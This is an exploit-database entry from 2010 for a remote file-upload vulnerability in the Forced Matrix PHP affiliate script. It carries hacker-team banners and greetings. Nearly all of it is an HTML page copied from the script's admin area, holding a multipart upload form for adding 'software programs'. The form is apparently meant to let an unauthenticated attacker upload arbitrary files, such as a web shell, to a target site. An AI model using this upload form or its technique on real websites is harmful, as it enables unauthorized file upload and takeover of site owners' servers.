Exploit for php platform in category web applications
================================================
Forced Matrix Script Remote Upload Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Vendor: www.vivaprograms.org
# Date: 2010-07-27
# Author : indoushka
# Thanks to : Dz-Ghost Team
# Contact : http://www.hack-r1z.com/cc/
# Tested on : windows SP2 Francais V.(Pnx2 2.0)
########################################################################
# Exploit By indoushka
-------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<style>
td { font-family:Verdana,Tahoma,Arial; font-size:12px; color:#000000; line-height:17px;}
.menu { color:#ffffff; text-decoration:none; }
.menu:hover { text-decoration:underline; }
.right { font-size:10px; }
input, textarea { background-color: #DFE3E9; border-bottom: #888888 1px solid; border-left: #888888 1px solid; border-right: #888888 1px solid; border-top: #888888 1px solid; color: #000000; font-family: verdana,tahoma; font-size: 10px;}
.but {background-color:#32004B; border-bottom:#000000 1px solid; border-left: #000000 1px solid; border-right: #000000 1px solid; border-top: #000000 1px solid; cursor: hand; font-family: verdana, tahoma; font-size: 10px; font-weight: bold; color: #ffffff; }
</style>
<body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<div align="center"><img src="../images/Header2.jpg" width="727" height="147"><br>
<font color="#FFFFFF">-</font><br>
</div>
<html>
<head>
<title>Manage soft</title>
<meta http-equiv="Content-Type" content="text/html;">
<style type="text/css">
<!--
.ver {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: x-small;
}
.btn {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: xx-small;
}
-->
</style>
</head>
<body>
<center>
<script language="JavaScript">
<!--
function jumpMenu(targ,selObj,restore){
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
//-->
</script>
<div align="center">
<select name="select" onChange="jumpMenu('parent',this,0)" align="top">
<option value="adminlogin.php" selected>Navigation Options</option>
<option value="adminlogin.php">-------------</option>
<option value="adminlogin.php">Main Menu</option>
<option value="adminedit.php" >Modify Admin Login Details</option>
<option value="admafflist.php" >List Current Affiliates</option>
<option value="admpref.php" >Preferences</option>
<option value="admbanners.php" >Banner and Text Link Setup</option>
<option value="upload.php" >Manage Software Programs</option>
<option value="admsubscr.php" >Manage Subscribtions</option>
<option value="admitemset.php" >Affiliate Payment / Single Item Setup</option>
<option value="admrefunds.php" >Cancel Payments / Refunds</option>
<option value="adm-email-edit.php" >Customise emails to affiliates</option>
<option value="admallaffmail.php" >Email all affiliates</option>
<option value="admstartpages.php" >Customise affiliate start pages</option>
<option value="adm-shift.php" >Shift Downline</option>
<option value="addbanner.php" >Banners</option>
</select>
</tr>
</table>
<br><h2>Add another programm:</h2><br></div>
<form action="" method="post" enctype="multipart/form-data" name="form1">
<div align="center">
<input type="hidden" name="add" value="true">
<input type="hidden" name="editid" value="">
<input type="hidden" name="edit" value="">
<table>
<tr>
<td>Title</td>
<td><INPUT maxLength=250 size=40 name=title value=""></td>
</tr>
<tr>
<td>Description</td>
<td><INPUT maxLength=250 size=40 name=description value=""></td>
</tr>
<tr>
<td>Price</td>
<td>$
<INPUT maxLength=15 size=7 name=price value="0.00"></td>
</tr>
<tr>
<td>File</td>
<td><input type="file" name="file">
</td>
</tr>
</table>
<br>
<INPUT type=submit value="Add Item">
<INPUT type=reset value="Clear Form">
</div>
</form>
<br> <form method="post" action="http://127.0.0.1/forced_matrix_script/admin/adminlogin.php"> <input type="submit" name="Submit" value="Click here to return to Main Menu">
</form>
</CENTER>
</body>
</html>
Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te
---------------------------------------------------------------------------------------------------------------------------------
# 0day.today [2018-01-06] #